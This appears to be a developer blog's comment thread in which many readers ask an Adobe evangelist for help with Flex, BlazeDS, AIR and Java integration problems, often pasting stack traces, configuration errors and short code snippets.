Ashish think that I am not representing correctly for the interviewer. I have searched in the googlge but no one is giving correct answsers.So can u please give the answers at the interview point of view.Or can u give the reference links for preaparing for interview. If u r ok for this i will send the list of questions which interviewer has asked me.
Thanks in advance….
Looking forward for your reply……… am thinking I am not representing correctly for the interviewer. So can u tell where I can get correct answer in the interview point of view and I will send the interview question if u r ok with this…
Thanks in advance…
Looking forward for your reply…….
Hi Sujit,
You are doing nice job…ur replys helping a lot for the people who are working on it…
I have one problem.. please help me..
I have some vboxs ….i want move clicked one to top…and remaining should move in circle..
example.. i have 4 vboxs like 1 2 3 4
I clicked 3…result of order should be 3 4 1 2
thanks
Veera
Hi Sujith,
We are trying to load test one of the applications built on flex framework. While recording the scripts using webload, we are getting an exception saying “Cannot create class of type DSK”. Could you please let us know where i can find this class/jar file?
Here is the log information
Apr 29, 2010 10:21:58 AM WLAmfMessage createMessageFromBuffer
FINER: ENTRY
Apr 29, 2010 10:21:58 AM com.radview.amf.WLAmfMessage createMessageFromBuffer
WARNING: Exception occurred while reading message.amf.Amf3Input.readScriptObject(Amf3Input.java:430)
at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:153)
at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:132)
at flex.messaging.io.amf.Amf0Input.readObjectValue(Amf0Input.java com.radview.amf.WLAmfMessage.createMessageFromBuffer(WLAmfMessage.java:152)
at com.radview.amf.WLAmfMessage.(WLAmfMessage.java:76)
at com.radview.amf.WLAmfMessageNavigator.getMessageStructure(WLAmfMessageNavigator.java:155)
Apr 29, 2010 10:21:58 AM WLAmfMessage createMessageFromBuffer
Hello Sujit,
It was nice to meet you and get new information on the FlashBuilder4 during the seminar in Adobe, last month. 🙂
I am building a AIR application and using Updater UI, since we have iterative releases. But some of my users do not have admin privileges on there machines. The first deployment is not a problem since I can take help from the admin to get it installed, but consecutive updates wont work. Is there a way we can work around this problem or does version 4 supports this. Kindly let me know your thoughts.
Thanks,
Varun
Hi,
i have a requirement to roll a single image into half circle shape, i searched google but i found galleries but i just wanna paste single image on a cup. so thought of 1st moulding it and then paste it.
guide me thru the links.
-madhu
Hi Sujit
I have a question regarding flex java communication using remoteobject.When do we require to define channels runtime in application?because sometimes it works fine without defining any channel runtime but sometimes not.
Thanks
Amruta
Hi Sujith
Can i use oracle datasource in lcds.xml.Its gving me error .I am using this resource property
I am not sure about type type=”javax.sql.DataSource”
Hi Sujit,
I want to know how I can create dynamic reports in a flex applications. Just like crystal reports. I want to generate list of people citywise or coursewise. suggest me any other alternative. I am building my application with Flex & PHP & MySQL.
Thanks
Akash
Hi Sujit,
I want to know about EXTJS framework. I have heard that once GUI is ready in EXTJS, we can use the same GUI with adobe air. Could you please guide me for the same how to do the same.
May 17, 2010 5:33:24 PM org.apache.tomcat.util.digester.SetPropertiesRule begin
WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property ‘source’ to ‘org.eclipse.jst.jee.server:VideoChat’ did not find a matching property.
May 17, 2010 5:33:24 PM org.apache.tomcat.util.digester.SetPropertiesRule begin
WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Context} Setting property ‘source’ to ‘org.eclipse.jst.jee.server:CustomerCare’ did not find a matching property.
May 17, 2010 5:33:24:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\MySQL\MySQL Server 5.1\bin;C:\Program Files\Java\jdk1.6.0_18\bin;C:\Program Files\Java\jdk1.6.0_18\bin;
May 17, 2010 5:33:24 PM org.apache.coyote.http11.Http11Protocol init
INFO: Initializing Coyote HTTP/1.1 on http-8080
May 17, 2010 5:33:24 PM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 276 ms
May 17, 2010 5:33:24 PM org.apache.catalina.core.StandardService start
INFO: Starting service Catalina
May 17, 2010 5:33:24 PM org.apache.catalina.core.StandardEngine start
INFO: Starting Servlet Engine: Apache Tomcat/6.0.20
**** MessageBrokerServlet failed to initialize due to runtime exception: Exception: flex.messaging.MessageException: An unknown exception occurred while creating an instance of type ‘cc.ClsTEST’.
at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:161)
at flex.messaging.Destination.createAdapter(Destination.java:341)
at flex.messaging.config.MessagingConfiguration.createAdapter(MessagingConfiguration.java:372)
at flex.messaging.config.MessagingConfiguration.createDestination(MessagingConfiguration.java:364)
at flex.messaging.config.MessagingConfiguration.createServices(MessagingConfiguration.java:332)
at flex.messaging.config.MessagingConfiguration.configureBroker(MessagingConfiguration.java:100)
at flex.messaging.MessageBrokerServlet.init(MessageBrokerServlet.java:129))
Caused by: flex.messaging.MessageException: Given type ‘cc.ClsTEST’ is not of expected type ‘flex.messaging.services.ServiceAdapter’.
at flex.messaging.util.ClassUtil.createDefaultInstance(ClassUtil.java:85)
… 23 more
May 17, 2010 5:33:25 PM org.apache.catalina.core.ApplicationContext log
INFO: Marking servlet MessageBrokerServlet as unavailable
May 17, 2010 5:33:25 PM org.apache.catalina.core.StandardContext loadOnStartup
SEVERE: Servlet /CustomerCare threw load() exception
javax.servlet.UnavailableException: An unknown exception occurred while creating an instance of type ‘cc.ClsTEST’.
at flex.messaging.MessageBrokerServlet.init(MessageBrokerServlet.java:170))
May 17, 2010 5:33:25 PM org.apache.coyote.http11.Http11Protocol start
INFO: Starting Coyote HTTP/1.1 on http-8080
May 17, 2010 5:33:25 PM org.apache.jk.common.ChannelSocket init
INFO: JK: ajp13 listening on /0.0.0.0:8009
May 17, 2010 5:33:25 PM org.apache.jk.server.JkMain start
INFO: Jk running ID=0 time=0/19 config=null
May 17, 2010 5:33:25 PM org.apache.catalina.startup.Catalina start
INFO: Server startup in 1255 ms
May 17, 2010 5:33:49 PM org.apache.catalina.core.StandardWrapperValve invoke
INFO: Servlet MessageBrokerServlet is currently unavailable
what to do???
[RPC Fault faultString=”Send failed” faultCode=”Client.Error.MessageSend” faultDetail=”Channel.Connect.Failed error NetConnection.Call.Failed: HTTP: Failed: url: ‘'”]Error In the Code
i checked all the xml files, but, i am unable to rectify the problem.
please tell me how to make the code run…
hi sujit,
Is there a limitation to restore AIR application from system tray using Native windows commands like ShowWindow and WinMain? I have a light weight .Net client application that is responsible for invoking AIR application. Once done it dies and then I can use my AIR application itself to control minimize/maximize application. But if I use .Net client, I wasn’t able to restore it back using any of the native code. Appreciate your comments on the same.
Thanks,
Varun
Hi Sujit,
I want to download blaze monster(in AIR version) , can you please send me the correct link to download.
thanks,
Manimaran.
Hi Sujit,
i am facing one wired problem which i am not able to reproduce in my dev environment. but @ QA environment explore are crashing and giving the following error.
“The Instruction at “0x7e1f9883” referenced memery at “0x017674e0”. The memory could not be “read”.
Click on Ok to terminate the program.
Please suggest me wheather it has the problem with QA set up. They are using the IE6 and in dev we are using the IE8 with flash player 10.
can you look at this question.
Please share your thoughts.
Created a java pojo with boolean attribute on backend .
For example like this,
public class CustomerBO {
private boolean isFunction;
public boolean isFunction() {
return isFunction;
}
public void setFunction(boolean isFunction) {
this.isFunction = isFunction;
}
public CustomerBO() {
}
}
2. Create a remote service that returns this object.
3. using FlashBuider connect to this service , it generates action script classes (valueobjects & service classes ).
But it’s not compiling , we don’t know how it generates.
Looks like , isFunction method translated into as below , since function is a reserved word, it’s not compiling.
[Bindable(event=”propertyChange”)]
public function get function() : Boolean
{
return _internal_function;
}
We are trying to connect to existing backend system which has functions like this isFunction , isNull etc… ,
Is there any work around ?
Why it’s ignoring ‘IS’
Hi Sujith,
I am trying to write an ftp client and using flash.net.Socket to write the files at the ftp location. The files are getting written without any problem. But once the files are written I need to inform the user that its done. Can you please tell how to do it?
Hi Sujith,
We have a java web application. I embeded flex chart in one of the jsp pages of the web application. When I login to the application and navigate to that jsp, flex chart shows up just fine. But, after that if I want to navigate to a different page in that application, it logs me out since my login session is lost. How to keep hold of this login session after flex chart is displayed?
I am new to flex, I would really appreciate your help.
Hey Sujit,
I am new to flex and blazeds. I had the following question.
I am trying to pass a complex object from Java to Flex using BlazeDS. I have three classes
public class Phone {
public long number;
public String type;
}
public class Addres {
public String city;
public String state;
public String type;
}
public class ContactInfo {
public Phone phone;
public Address address;
}
in another class I have the following two methods. this class is a exposed to flex in the remote-config.xml in blazeds
public Phone getPhoneNumber() {
Phone phone = new Phone();
.. some code..
return phone;
}
public ContactInfo getContactInfo() {
ContactInfo cinfo = new ContactInfo()
… some code..
return ContactInfo
}
Above are my classes on Java side and I have similar classes on Flex side.
package object
{
[RemoteClass(alias=”Phone”)]
public class Phone {
public var number : Number;
public var type : String;
}
}
package object
{
[RemoteClass(alias=”ContactInfo”)]
public class ContactInfo {
public var phone: Phone;
public var address: Address;
}
}
If I call a java method from flex which returns an object of type Phone, I am able to get that object on flex side and access all its data field, but if I try to access an object of ContactInfo which internally has Phone and Address object, I get an error #1009: Cannot access a property or method of a null object reference.
If I run test code calling the same methods on java side, I am able to print all the values from the object ContactInfo.
I am missing something when I try to call a method which returns an object which internally holds other objects instead of standard data types?
Thanks in advance! Any help is appreciated.
—
Rahul
Hi Sujit,
I appeared for the Adobe Flex 3 with AIR exam and cleared the exam with a score of 84 %. I am extremely happy and feel elated that I am now part of the Adobe Certified Expert Community. Your blogs greatly helped me to explore all topics. Thank you.
hi
i was setthe focus to the TextInput component, (this is component in login window). This highlights my TextInput component, but it is not place
cursor in textinput
Hi sujit
i was setthe focus to the TextInput component, (this is component in login window). This highlights my TextInput component, but it is not place
cursor in textinput
this highlights my TextInput component,but cursor not placed into
textinput.
please send solution for my problem.
1) I wrote Code in html-template \index.template.html file
2) This is Mxml Code
loginRequest_Click();
2) I wrote this Code in LoginViewAS.as file
public function setfocus(event:Event):void
{
if (ExternalInterface.available)
{
ExternalInterface.call(‘setFocus’);
}
else
{
Alert.show(“Browser not available”);
}
this.focusManager.setFocus(LoginView_UserNameTextInput);
LoginView_UserNameTextInput.text = EMPTY_STRING;
LoginView_UserNameTextInput.text = EMPTY_STRING;
LoginView_UserNameTextInput.selectionBeginIndex = 0;
LoginView_UserNameTextInput.selectionEndIndex =
LoginView_UserNameTextInput.text.length;
}
Hi Sujit,
I am new to LCDS, just a quick question is it possible to create joins from LCDS?
i was installed LCDS. but when i was trying to connect java server its showing unknown error “my-http” missing. Need help
Hi,
We are using a BlazeDS turnkey solution which was running perfectly on localhost:80 when viewed from the local machine.
When we try to change the localhost to a fixed IP in the services-config.xml file, the remoting calls return Send Failed. Have tried a few options but no luck so far.
All help is highly appreciated.
Best regards,
Sanjeev
Hi Sujit
I would like call MDB from flex without using Blze or LCDS.What is the approach i have to follow.Can you suggest me
Hi,
I am developing an appication in flex 4. I want to know which one to use “BlazeDs” or “PHP” as backend.?
How can we pause and resume the timer in flex.
var timer:Timer=new Timer(10000);
now i want to pause the timer after 5 seconds if some event occurs and resume from 5 seconds if another event occurs.
hi
I have integrated Flex with Java through blazeds. Its very small program in which i set/get the value to/from the Java class data member. I set the value but while getting the value from class through other member function it returns “null” at event.result in flex.
So i have one doubt “do i access the member variable through other function via remote object ?”
All function are public declared at JAVA class.
I am new to Flex. I am following your blog ..
HI Sujit,
I am using blazeds spring.
I am using FlexContext.getFlexSession()
to access flexSession and store some object there.
But at some time I am getting this exception, please let me know if you have ever faced the same problem or you have any solution.
Thanks
java.lang.IllegalStateException: setAttribute: Session already invalidated
at org.apache.catalina.session.StandardSession.setAttribute(StandardSession.java:1261)
at org.apache.catalina.session.StandardSession.setAttribute(StandardSession.java:1243)
at org.apache.catalina.session.StandardSessionFacade.setAttribute(StandardSessionFacade.java:130)
at flex.messaging.HttpFlexSession.setAttribute(HttpFlexSession.java:458)
at com.barcap.hpscui.serviceImpl.UIQueueImpl.saveUserProfileInFlexContext(UIQueueImpl.java:1081)
at com.barcap.hpscui.serviceImpl.UIQueueImpl.getUserDetailsFromSession(UIQueueImpl.java:1815)
at sun.reflect.GeneratedMethodAccessor595.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:585):1503)
at flex.messaging.endpoints.AbstractEndpoint.serviceMessage(AbstractEndpoint.java:884)
at flex.messaging.endpoints.AbstractEndpoint$$FastClassByCGLIB$$1a3ef066.invoke()
at net.sf.cglib.proxy.MethodProxy.invoke(MethodProxy.java:149)
at org.springframework.aop.framework.Cglib2AopProxy$CglibMethodInvocation.invokeJoinpoint(Cglib2AopProxy.java:700)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:149)
at org.springframework.flex.core.MessageInterceptionAdvice.invoke(MessageInterceptionAdvice.java:59)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171)
at org.springframework.aop.framework.adapter.ThrowsAdviceInterceptor.invoke(ThrowsAdviceInterceptor.java:126)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171)
at org.springframework.aop.framework.Cglib2AopProxy$FixedChainStaticTargetInterceptor.intercept(Cglib2AopProxy.java:582)
at flex.messaging.endpoints.AMFEndpoint$$EnhancerByCGLIB$$2e2fe31d.serviceMessage().endpoints.AMFEndpoint$$EnhancerByCGLIB$$2e2fe31d.service()
at org.springframework.flex.servlet.MessageBrokerHandlerAdapter.handle(MessageBrokerHandlerAdapter.java:101)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:875)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:807)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:571)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:511)
Hi Sujit,
We are using the BlaseDS libraries to serilize the Java ArrayList (amf3Output.writeObject(arrayList)) and on the client side reading the byte stream and the casting the read stream of bytes as ArrayCollection (event.result as ArrayCollection). This was working fine while we were using Flex SDK 3.1 and BlaseDS 3.2 libs. The we compiled the same code with Flex 3.4.0 and above , the flex is not recognising as ArrayCollections.
If you can provide any pointer to solve the issue? I appreciate any help..
Hi Sujit.
I ‘m using Flash and AS3 to develop my applications. I downloaded the library and helper pdf files but i could not run it unfortunately. I wonder, does it run with Flex only? I ‘m working in a private company and we want to use your library in a big ERP project. Can you give me an example file or something like that please?
Best regards.
hi,
i have a flash application that interacts with a URL. the flow goes like this
-> refers to Redirect, => HTTP POST
flash as3 -> page A.aspx -> page B.aspx -> Page C.aspx => Page B.aspx -> page A.aspx ->flash as3
the page A sends a XML response to flash.
Now when page c.aspx POSTS data to Page b, flash reads this data and gives this error “Since your browser doesnt support
javascript, you need to hit continue button to proceed”.
Actually we are expecting flash to read the XML response from page A.aspx.
i want flash to read the XML result from page A.aspx….is there a woraround to get this working?
Dear Sujit,
I am working on a recruiting software, UI is all flex and backend is Java.
I have the prototype, but my UI sucks.. If you can recommend some UI expert (person /company) who can create UI’s with a kool look n feels, I would appreciate very much.. Preferably in Pune or Bangalore.
Looking forward..
regards
Makarand
Hi,
I need to do ftp to different ftp locations of the users. It worked fine from my local machine. But when I deployed it on my server it gave SecurityError–>Error #2048: Security sandbox violation: cannot load data from myuser.
I kept crossdomain.xml in server root directory and its accessible with but still the security error is thrown.
Do I need to anything else on flex side like loading the crossdomain.xml on application init etc.Any ideas?
[MessagingError message=’Destination ‘CreatingRpc’ either does not exist or the destination has no channels defined (and the application does not define any default channels.)’]
I have created a 2nd java class in the same java project.
In the remoting -config file too i have added the
RemoteServiceHandler
But its isnt working
Hi Sujit,
we are using webservices to fetch data from jboss server. we were able to fetch data when i call any of the method with no arguments, but when any method with any custom AS class as param the operation fails with #1009 eror.Cannot access a property or method of a null object reference.
I made sure that none of the objects are null.
Let me know if there are any issues with this.
Thanks
Hi Sujith,
I am trying to use appendChild, this xml has multiple nodes of same element. For example my xml is like this
var testxml:XML = abc
This is the xml that I have to append
var appendXML:XML = AB
I have a lot of class nodes that I have to construct dynamically.
When I try using testxml.categories.category.appendChild(appendXML)
there is a runtime exception APPENDCHILD works on only list containing one item. I have tried using various ways and other methods. Can you suggest some way to append this xml.
Thanks
I’m having a problem in exactly 30 seconds with AIR 2.0/BlazeDS request. The error is not a requestTimeout. Error message:
Any hint how to fix this problem?
Hi Sujith,
I have the problem in convert Hexa Decimal values to Integer and display the Time in Flex.
Here is same xml code :
FFFF4A78
FFFF4B4A
FFFF4DBF
Please help in converting this to readable time format.
Thanks in advance.
Regards,
Ravichandran J
Hi Sujith,
I am learning on Flex and integrating Flex with Java using BlazeDS. We are planning to move to Flex and remove the Java Swings.
I have a following query.
I have read that Polling and Long Polling are possible.
But I was not able to find any sample examples for that.
My requirement is , From Flex, i will call a java method. In Java, i will do the processing and I will send some notification to Flex(Client) and the Flex will show it in UI.Also the notification that i send should be of a common structure which both Flex and Java can understand.The structure will have a type of the notification and the value for it.
How can i do it? Can you help with sample examples for both Polling and long polling and the server is in Java and Using BlazeDS?
It would be helpful for me and many others.
Regards
Srini
Hi Sujit,
I have an requirement in my project where I want to create my own Flex Session on the web server.
Is that possible?
Please let me know if i can do this,
Thanks in Advance.
Hi Sujith,
I’m using AS3 library for Google Calendar API.
How I can retrieve my existing calendar?
I have to call getAllCalendars(userVO) void function and then how I can access to allCalendars variable that contains my calendars?
Hi Sujith,
how I can do authentication, get my calendars, but I can’t add an event to the calendar selected.
Can you help me?
Can you post an example with authentication, retrieve calendars, and add an event to a calendar?
Thanks in advance
Hi Sujit,
I’m following your site and posts regularly.It helped me lot in Flex initially.Past 2 years I’ve worked many Java, flex projects with help of Evangelists like you. Actually I don’t have any questions to you today, Just wanted to greet and thank you. Keep Rocking….
Thanks,
Pothiraj
Hi,
I am working with flex 4 and blazeds.
On the server side I have method that receive string and return result of sql query as ArrayList.
The results are of different table each time depending on the string I send.
In the result I put in place 0 the column names.
When I try to change the column property of the datagrid I receive no data in the datagrid.
Below is the code of the event.
What can cause this ?
Thanks
private function resultHandler(event : ResultEvent) : void {
data = event.result as ArrayCollection;
Alert.show(data.length.toString());
var columnNames : String = data.getItemAt(0).toString();
var columns : Array = columnNames.split(“,”);
var columnArray : Array = new Array();
for (var i :int=0; i < columns.length; i++) {
var dataGridColumn : DataGridColumn = new DataGridColumn(columns[i]);
columnArray.push(dataGridColumn);
}
dataGrid.columns = columnArray;
}
Hi Sujit,
I need some information regarding LCDS; like how to get the license, what is cost, what kind of license is it, how to install it and stuff like that.
Can you please help me in this?
Thanks in Advance
Naveen
I want to export the advanceddatagrid to CSV file, I write the code that working quite good but i face the problem. It should not genrated the heirarical data and also the grouped column in CSv file, any one have the solution then lz help me….
Hi Sujit,
I have been struggling for Flex and BlazeDS. Uzair
Hi Sujit,
I’m building Flex application with BlazeDS/LCDS on background. Currently I have small problem, with uploading files to server.
There are two solutions, how to upload file on server.
1) Load selected file into object and send this file thru RemoteObject to server. This options work for me, because server backend recieve object with my file and all security rules and sessions are accessible ( is user logged or not, session data about user). But there are some cons. I need to load whole file into flash player and if is file big, flash player freeze for a while. Other cons is, I lose upload progress (eq for progressbar).
2) Create upload servlet and upload selected file by fileReference.upload( URLRequest ). With this option I get upload progress and flash client not freeze, because file is uploaded on background. But here are some cons too. I can’t access to FlexContext, so i lose authorization and session data.
I’m not sure, which option chose. Second solution is better for users, because they see file upload progress. But it is security risk for me, because I can’t access to FlexContext.
Solution is, somehow add my upload class to FlexContext. In this case I would see that FlexContext. But I don’t know, how to do this.
Thanks for any help.
Peter
Sujit,
I have a FlexClient which only uses HTTPServices for RPCs. We dont have any BlazeDS as of now.
In order to use the messaging, I will be using BlazeDS. Is there a way where, while talking to BlazeDS (using Consumers – short po9lling), it doesnt reset my usual session for client. In other words, if client X is logged IN and I make server calls through Consumer (short polling mechanism), it should not affect the client’s session at all. Is it possible?
Hey Sujit,
I am a bit of a novice in Flex. I have everything working with BlazeDS, I am having trouble setting up order of my internal Flex containers/components they each get data from my java app server, and I would like them to each contact my app server at the same time, and then become visible as each completes. Right now it’s following a serial order. We are using states, and it seems right now the The child most component is loading first and then going upwards. I hope you understand what I mean. The codes’ huge so I can’t post it.
Hi Sujit,
I have managed to sort out the issue and my application is running perfect now. Anyways thanks for all the brilliant material here.
I have another question. I have a chart and I am passing values to draw lines through an array. What I want to do is, I want to draw DOTS or Points over the same line graph as well but for Dots the data will come from an sql data source. Therfore, is thei any ways to use two datasources for the same graph, where first datasource will be drawing lines while the second datasource will be plotting dots over the same graph. OR Is their any other way to do this.
Thanks in advance.
Kind Regards,
Uzair
Hi sujith,
I am new to flex and trying some sample application.
Below is the issue im facing.
I have 2 projects in flexbuilder.
1st project used for UI
2nd project to map to java class(interfaces,as files)
I have given project ref from project 2 to project .And I have taken swf and html file from project 1 and placed in eclipse to test UI and services chnages together.
Issue:
I have removed couple of methods in project 2(calling and its implementation logice) but while running in eclipse it gives error telling that “method not found”.Looks like chnages i have done in project 2 its not taking in eclipse.
can you please suggest me on this
Hi Sujit,
I have managed to solve the second problem as well, which was using two different datasource from two different places and its working perfect now.
Now my question is, Curretnly I am plottin bothe datasources as lineseries using linechart but what I want to do is, in the same linechart, I want to show data from one datasource as lines and data from otherdata source as DOTs. Please give me some suggestions that how can I achieve this.
Thanks in advance.
Regards,
Uzair
Hi Sujith,
I want to do Adobe Flex Certification. Can you please guide me how to do that and any mock test papers are there for Flex Certification.
Thanks in advance……
I followed the example in this:
Now while starting Tomcat i get this error:
MessageBrokerServlet in application ‘BlazeDS’ failed to initialize due to runtime exception: Exception: flex.messaging.config.ConfigurationException: adapter not found for reference ‘RandomDataPushAdapter’ in destination ‘RandomDataPush’.
Not sure where I’m wrong I have checked Service-config.xml and messaging-config.xml
Any pointers?
Hello,
We are developing a tool which will automate and execute command prompt related commands. This tool is specific TO OUR PROJECT FRAMEWORK. We are facing a few difficulties.Below is the code snippet.
protected function updateTargets(targets: String): void {
var file:File = File.documentsDirectory;
//TODO relative path
file = file.resolvePath(“C:/Users/224439/Documents/TM1/MaestroCommands/meastroCommand.properties”);
var fileStream:FileStream = new FileStream();
fileStream.openAsync(file, FileMode.WRITE);
fileStream.writeUTFBytes(“command.targets=”+targets);
fileStream.addEventListener(Event.CLOSE, executeCommands);
fileStream.close();
}
The above code containing resolvePath() works fine when absolute path is given.But we want that meastroCommand.properties file should be generated in flex-air project directory itself. We have tried using resolvePath with documentsDirectory, applicationDirectory, desktop and applicationStorageDirectory etc. This creates the meastroCommand.properties file outside the project. Could you please guide us regarding this ASAP. Also it would be helpful to know about any alternative API which may help in setting relative path.
Hi Sujit,
Is it possible to intercept action script object responses from and construct action script object requests to be sent to a third party server?
I do not have access to the server and do not know the structure of their objects.
I believe it is possible without deploying a crossdomain.xml file to the 3rd party server, using HTTPService.useProxy = “true”.
So with this, is it possible to create a java app client that would interact with their server as their client Flex app does?
Again, I have no access to their server and know nothing of their Object structures or API other than what I can see using Firebug to watch the wire while using their Flex app.
I am very much looking forward to your response.
Thank you,
David
Hello Sujith,
I am ussing Coldfusion 9 and I am trying to send and recieve messages (client/client) in Flex using producer and consumer.
I am using the cf-polling-amf channel and the ColdFusionGateway destination.
I am a bit lost and stuck with this error :
“Unable to find ColdFusion gateway ‘cfgateway’ in RMI registry on host localhost. The gateway may not be running.”
I read that RMI is used with LCDS but LCDS is not installed by default with CF9 but BlazeDS is.
So what do I need to do in order to get this working ?
Thanks a lot,
Regards from Belgium,
Aubry
Hi Sujit,
I am new to flex so please excuse if my questions doesnt make much sense.
I would like to make an application, whose front end is in flex and backend as Java. I am not using any webs server, hence not sure if BlazeDS makes sense here or not. I have a complex Java Core code, consisting of many classes, and would like to call the java code from flex/action script.
Can you please help me understand this? Would appreciate your help!
Thanks.
Hi suji:
My situation is this. My team developing a flex3 blaze ds aplication that uses remote object to write/read the database and producers/consumers to inform other instances of the same app that the database has been modified so they update themselves as I/the clients can’t afford lcds. Another team is developing a different aplication that also runs on blazeds/flex3. Now we need to add a messaging system, very similar to forum threads that can be shared between the two applications. What we want to do now is share remote objects/messaging channels between the two completely separate flex/blaze projects so we only need to write/update one set of java classes that do the forum-thread database writing as well as creating a shared messaging channel between the two different flex apps.
We used you blaze monster and we were able to comunicate with it to our separate applications, when we added the code it generated to a non blaze ds flex project it also worked perfectly. but when we added that code to a blaze-ds/java flex project we got a sandbox security error. also this only worked for remote objects and not for messaging channels.
We ahve been searchign around but have not found any examples of poeple doing the cross application comunication so if you could guide us in the apropiate direction we would be thankful.
Hello Sujit,
I want to create application using Flex 4 and BlazeDS in which i want to sync. client – server data (means data pushing). So, Can you please guide me that how can i achieve this.
Thanks
Hi Sujith
This is Chaitanya. I am having problem with validateNow() function on an object which contains a Huge CustomDataGrid. The DataGrid contains more 2500 rows of data. I am getting the following error
“Error: Error #1502: A script has executed for longer than the default timeout period of 15 seconds.
at mx.managers.layoutClasses::PriorityQueue/removeLargestChild()[C:\autobuild\3.5.0\frameworks\projects\framework\src\mx\managers\layoutClasses\PriorityQueue.as:145]”
The code works greats if the datagrid has less than 100 rows..
Need help badly..
just to update that I ahve sovled my problem, thanks anyway.
What is the easiest why to configure Flex-Spring-Hibernate Project in eclipse.
hi Sujit,
i am new to Flex.i trying to call java function from flex button click.
but am getting sending failed error can you please help me. i followed your example but am getting thos eror please give me some idea
Hi Sujith,
I am using the FlashBuilder profiler, but I am trying understand what the (%) values mean ,specially in the context of cumulative instances and memory . Any insight into this will be greatly helpfull.
Regards
-Chandu
Hello Sujith,
After a lot of researches and copy/paste on Google, I finally decide to create a topic here, that means I am totally desperate.
I have a dev environment on a Windows platform with Apache/PHP/MySQL and Flash Builder 4. I am using the Zend Framework in order to communicate with PHP classes in Action Script. Locally, all work perfectly, PHP works and content is correctly updated in my Flex apps.
But I have a problem when i deploy application on my server(linux).
I just export my Flex app to a release build, I modify the amf_config.ini. And I am sure my configuration is correct.
ZendFramework is correctly installed.
Class “xxxxxx” does not exist: Plugin by name ‘xxxxxx’ was not found in the registry; used paths: : /xxxxxx/www/services/
The path is correct, my services are in the “services” folder, but Zend does not find the classes. Is there a difference between Zend Framework running on Windows and deployment server.
Can you help me?
Thanks a lot.
Regards.
Akash
Hi Sujith,
How can I pass Value object to java side by using Remote Object. Can you plz give me samll example on this same.
Like this we can send name to java side.
Same thing I want to Send Value Object to java side by using Remote Object. Can u plz tell me how it is?
Thanks
Chowdary
Hi Sujit,
I have a requirement to implement a feature like providing on-screen help related to the panel/control/form(using F1). By using this feature,user who is using my application can get information on particular portion of help.
I am using flex 4 + cairngorm 3 + blazeDS + spring + hibernate
Thanks & Regards,
Prakash.
hi Sujith,
I am working on a flex datagrid with pagination feature. I also want to have a copy and paste functionality from datagrid to excel.
Do you have any article on it or can you point me to some resources?
Thanks
Hi sujit,
Im an intern under grad doing my project in Flex and Struts. I dont have any experience working on either technology. Can you help me out by providing me with example code on CRUD app using Flex 3, Struts and Oracle 10g. I have managed to connect Flex and Struts using FStruts but i cant figure out the next move. I tried ur post –
But i wasnt able to connect to the database. Feels tough.. 😦 Well, incase u know any reference books or links that mite help me then post them too! Thanks in advance.
I am a java developer.I know Flex basics.I have a requirement that I have to connect to JSP from Flex without using LCDS & BlazeDS.Can please tell me how is it possible.If possible send me an example for it.
Regards,
Chowdary
Sujith,
I am developing an application for sailboat racing whereby racers provide their location via a flex application, and the locations are distributed to a viewing application.
Would you recommend blazeds? There would need to be queuing and logging.
thanks
Hi,
I have a datagrid, but the vertical line betwnn the
header rows and the data rows are not continuous, there is a slight angle, because of this I am not able to resize the column/header width. What css attribute controls this alignment.
Sujith,
i need to get session in java webservice.in java i am using xfireframe work.then i need to pass this session to flex client side,pls help me
give idea
thanks for advance
Hi Sujit,
I am using a datagrid with resizableColumns set to true. I can drag and resize columns with ease on my local setup. But when I deploy the same app on my dev env the dragging feature does not work and I cannot resize the columns. What I noticed usually the vertical line separator in the header section is continuous with the datarows verical separator, but on my dev env it is not continuous, there is very slight angle betn the two lines. Is that the cause. Is there any css attribute that controls this property?
Hi Sujith,
I want to migrate my flex 3 application to flex 4.
which component set should i choose for this new project?
there are two component set
1. mx+Spark
2. mx only
i can go with any one of the option, but i want to prefer one which will not create any performance issue.
can you please tell me the better one or
if you have any blog related to this please give me link.
Thanks
Krishna
Hi,
Can you Please help me on this :
com.ibm.ws.webcontainer.servlet.ServletWrapper init SRVE0100E: Uncaught init() exception created by servlet Service in application PG2Ear: java.lang.VerifyError: JVMVRFY027 receiver is incompatible with declaring class; class=javax/xml/marshal/StreamScanner, method=fail(ILjava/lang/String;)V, pc=97
I have migrate web application from WAS 6.0 to WAS 7.5.4.
Please if possible help me on this ASAP.
Regards,
Akash Srivastava.
I have been trying to integrate a flex app that is run on my apache 2.2 server with a blazeds servlet on tomcat on the same box. I am using php and would prefer to maintain this so just moving my whole site to the tomcat server is not an option. I have ajp13 connection setup and my apache server can process jsp files in this manner but I have been unable to redirect my flex files to the servlets. I could have them access tomcat more directly but I believe I would need a cross domain file and I am under the impression these are not good. Have I been going about this setup correctly? Most of the stuff I have read only seems to mention the flex app running on the tomcat server. Thanks,
Hi,
I am a application developer in Microsoft.net technologies.
I am new to Adobe and wish to develop applications for blackberry mobile and blackberry playbook.
Please guide me what all tools I need to learn and how to go about it. Is there any training institue / workshop which I can attend.
I am located in Delhi/Noida.
Thanks.
Hi Sujith,
I wanna create a simple chat room application in flex. But in my server, ı need to know which users are online. So whenever a client connect to application , will see list of available users. Can you show me any java example about this.
thankss
Hi All,
I want to move all libraries from WEB-INF/lib to some external folder. but while doing so server throughs No Such class found exception. due to below entry in web.xml
flex.messaging.HttpFlexSession
I have included flex-messagin-core.jar in external folder but still getting this error,
what i need to change in configuration so that it will refer to my external lib folder.
Thanks
Hello sir
I am using amfphp and flex.
whenever i give url for in remote object end point api, it will work fine.
